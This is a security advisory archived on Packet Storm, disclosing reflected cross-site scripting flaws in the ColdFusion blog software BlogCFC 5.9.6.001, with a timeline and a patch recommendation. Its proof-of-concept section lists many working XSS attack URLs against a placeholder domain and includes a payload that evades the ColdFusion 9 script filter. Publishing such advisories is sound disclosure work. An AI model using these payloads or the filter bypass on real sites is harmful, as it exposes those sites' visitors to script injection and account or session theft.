what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BlogCFC Cross Site Scripting

BlogCFC Cross Site Scripting
Posted Dec 14, 2010
Authored by ProCheckUp, Richard Brain | Site procheckup.com

BlogCFC suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 4a5f358eaed72d5ca282ae8e50804475f5e28c6ce5892b58a294a6f1fbd50eca

BlogCFC Cross Site Scripting

Change Mirror Download
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-10



PR10-10 Various XSS within BlogCFC



* Advisory publicly released: Tuesday, 14 December 2010
* Vulnerability found: Sunday, 2 May 2010
* Vendor informed: Monday, 3 May 2010
* Vulnerability fixed: Wednesday, 19 May 2010
* Severity level: Medium

* Credits


Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com<http://www.procheckup.com>)

* Description
BlogCFC is a ColdFusion based blogging System.Procheckup has discovered that Various BlogCFC programs are vulnerable to generic reflective Cross Site Scripting (XSS) attacks.



Note: BlogCFC was tested on a fully patched Windows XP machine, ColdFusion 8 (unpatched) and SQL 2005 were used from the application server and the backend database.



Note: Coldfusion 9 includes a application firewall and will replace any <script> tag, To circumvent this the

<script>alert(1)</script> needs to be substituted with a tag not on the match list like </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")> (this works on IE7 & IE6)

BlogCFC Versions tested
5.9.6.001

* Proof of concept
Unauthenticated vanilla XSS. IE7 (Internet Explorer) browser used.

http://target-domain.foo/tags/podlayout.cfm?ATTRIBUTES.TITLE=<script>alert(1)</script>&thistag.EXECUTIONMODE=start

http://target-domain.foo/tags/textarea.cfm?attributes.class="></textarea><script>alert(1)</script>&attributes.fieldname=Procheckup&attributes.style=1&attributes.value=1&

http://target-domain.foo/includes/pods/subscribe.cfm?errorMessage="><script>alert(1)</script>

http://target-domain.foo/index.cfm?errorMessage="><script>alert(1)</script>

The following works due to the error page not sufficiently filtering tags on unpatched Coldfusion 8
http://target-domain.foo/stats.cfm?dur='</XSS STYLE=xss:expression(location='http://www.procheckup.com')>



The following examples the Mouse has to be moved over the subscribe input box

http://target-domain.foo/includes/pods/subscribe.cfm?"onmouseover="alert(1);

http://target-domain.foo/index.cfm?"onmouseover="alert(1);

http://target-domain.foo/search.cfm?"onmouseover="alert(1);

http://target-domain.foo/stats.cfm?"onmouseover="alert(1);

http://target-domain.foo/statsbyyear.cfm?"onmouseover="alert(1);

http://target-domain.foo/tags/getpods.cfm?"onmouseover="alert(1);
* How to fix
Apply the latest patched version.
* References

* Legal
Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to

Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close